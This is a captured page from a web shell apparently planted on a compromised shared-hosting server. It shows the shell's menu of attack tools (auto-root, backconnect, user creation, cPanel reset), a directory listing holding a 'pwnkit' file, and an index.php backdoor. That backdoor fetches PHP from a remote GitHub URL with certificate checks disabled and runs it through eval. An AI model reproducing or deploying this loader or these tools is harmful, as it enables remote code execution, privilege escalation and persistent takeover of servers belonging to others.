Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.129.69.134
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
balbehra /
myadmin /
photo /
[ HOME SHELL ]
Name
Size
Permission
Action
ALFA_DATA
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
10-24-24_QWN0aXZpdHkuanBn.jpg
220.38
KB
-rwxr-xr-x
10-37-49_ZG93bmxvYWQucG5n.png
4.73
KB
-rwxr-xr-x
10-38-18_ZG93bmxvYWQuanBn.jpg
6.11
KB
-rwxr-xr-x
error_log
786
B
-rw-r--r--
index.php
479
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php $url = 'https://raw.githubusercontent.com/keyla110/supershhell/main/apa.php'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $fileContents = curl_exec($ch); curl_close($ch); if ($fileContents === false) { die('[!] Cannot Get File : https://raw.githubusercontent.com/keyla110/supershhell/main/apa.php '); } eval("?>" . $fileContents); ?>
Close